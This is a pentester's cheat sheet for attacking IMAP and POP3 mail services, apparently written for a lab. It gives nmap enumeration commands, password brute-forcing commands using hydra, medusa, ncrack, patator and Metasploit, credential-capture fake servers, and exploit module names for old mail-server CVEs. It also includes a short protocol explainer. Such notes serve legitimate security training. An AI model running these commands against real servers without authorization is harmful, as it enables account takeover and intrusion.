IMAP & POP3

Resources

• IMAP / POP3 Deep Dive
  • Pop3 Vs IMAP : https://www.courier.com/guides/imap-vs-pop3-vs-smtp
• Exploitation
  • By habr : https://habr.com/en/companies/truevds/articles/262819/

Cheat sheet

• By secybr : IMAP | POP3
• By shuciran : https://shuciran.github.io/posts/IMAP-POP3-(tcp-110)/

Commands

• Discovery

  nmap 10.129.42.195 -sV -p110,143,993,995 -sC
  nmap -p110,995 --script=banner 10.129.42.195 -sT

• Scripts

  nmap -p110,995 --script=pop3-ntlm-info 10.129.42.195 -sT
  nmap -p143,993 --script=imap-ntlm-info 10.129.42.195 -sT
  nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p110,995 10.129.42.195
  nmap -v -sV --version-intensity=5 --script pop3-capabilities -p T:110,995 10.129.42.195
  nmap -sV --script=imap-capabilities -p143 10.129.42.195
  nmap -sV --script=imap-ntlm-info.nse -p143,995 10.129.42.195
   
  msf > use auxiliary/scanner/imap/imap_version
  msf > use auxiliary/scanner/pop3/pop3_version #MetasploitFramework

• Connect
  • Plaintext

    	telnet 10.129.42.195 110
        nc -nv 10.129.42.195 110
        nc -nv 10.129.42.195 143

  • Via SSL

    curl -k 'imaps://10.129.42.195' --user robin:robin -v
    openssl s_client -connect 10.129.42.195:pop3s
    openssl s_client -connect 10.129.42.195:imaps
    openssl s_client -connect 10.129.42.195:995 -crlf -quiet
    openssl s_client -connect 10.129.42.195:993 -quiet

• Bruteforcing

  hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
  hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
  hydra -t 2 -L users.list -P passwords.list -M 10.10.x.x.list -s 110 pop3
  hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
  hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f 192.168.x.x imap -V
   
   
  nmap --script pop3-brute --script-args pop3loginmethod=SASL-LOGIN -p T:110 IP
  nmap --script pop3-brute --script-args pop3loginmethod=SASL-CRAM-MD5 -p T:110 IP
  nmap --script pop3-brute --script-args pop3loginmethod=APOP -p T:110 IP
  nmap --script=imap-brute –script-args userdb=Users.list,passdb=Passwords.list -p143 192.168.x.x
   
  msf > use auxiliary/scanner/pop3/pop3_login #MetasploitFramework
   
  medusa -t 2 -T 2 -U users.list -P passwords.list -H 10.10.x.x.list -n 110 -M pop3
  ncrack -g CL=2 -U users.list -P passwords.list -iL 10.10.x.x.list -p pop3:110 -oA output
  patator pop3_login host=10.10.x.x user=FILE1 password=FILE0 0=users.list 1=passwords.list -x ignore:fgrep=’incorrect password or account name’

• Read Emails
  • CLI

    mutt -f "imaps://robin@10.129.42.195:993"

  • GUI

    sudo apt install evolution

• Exploits

  #Fake POP3/IMAP server 
  msf > use auxiliary/server/capture/pop3 
  msf > use auxiliary/server/capture/imap
  #Seattle Lab Mail 5.5 [CVE-2003-0264]
  msf > use exploit/windows/pop3/seattlelab_pass #MetasploitFramework
  Exploit-DB: 638.py, 643.c, 646.c
  #Cyrus – Gentoo 2006.0 Linux 2.6 [CVE-2006-2502]
  msf > use exploit/linux/pop3/cyrus_pop3d_popsubfolders #Metasploit
  Eudora Qualcomm WorldMail 3.0 [CVE-2005-4267]
  msf > use exploit/windows/imap/eudora_list

Notes

IMAP VS POP3

With the help of the Internet Message Access Protocol (IMAP), access to emails from a mail server is possible. Unlike the Post Office Protocol (POP3), IMAP allows online management of emails directly on the server and supports folder structures. Thus, it is a network protocol for the online management of emails on a remote server. The protocol is client-server-based and allows synchronization of a local email client with the mailbox on the server, providing a kind of network file system for emails, allowing problem-free synchronization across several independent clients. POP3, on the other hand, does not have the same functionality as IMAP, and it only provides listing, retrieving, and deleting emails as functions at the email server. Therefore, protocols such as IMAP must be used for additional functionalities such as hierarchical mailboxes directly at the mail server, access to multiple mailboxes during a session, and preselection of emails

INFO

By default, ports 110 and 995 are used for POP3, and ports 143 and 993 are used for IMAP. The higher ports (993 and 995) use TLS/SSL to encrypt the communication between the client and server. Using Nmap, we can scan the server for these ports. The scan will return the corresponding information (as seen below) if the server uses an embedded certificate.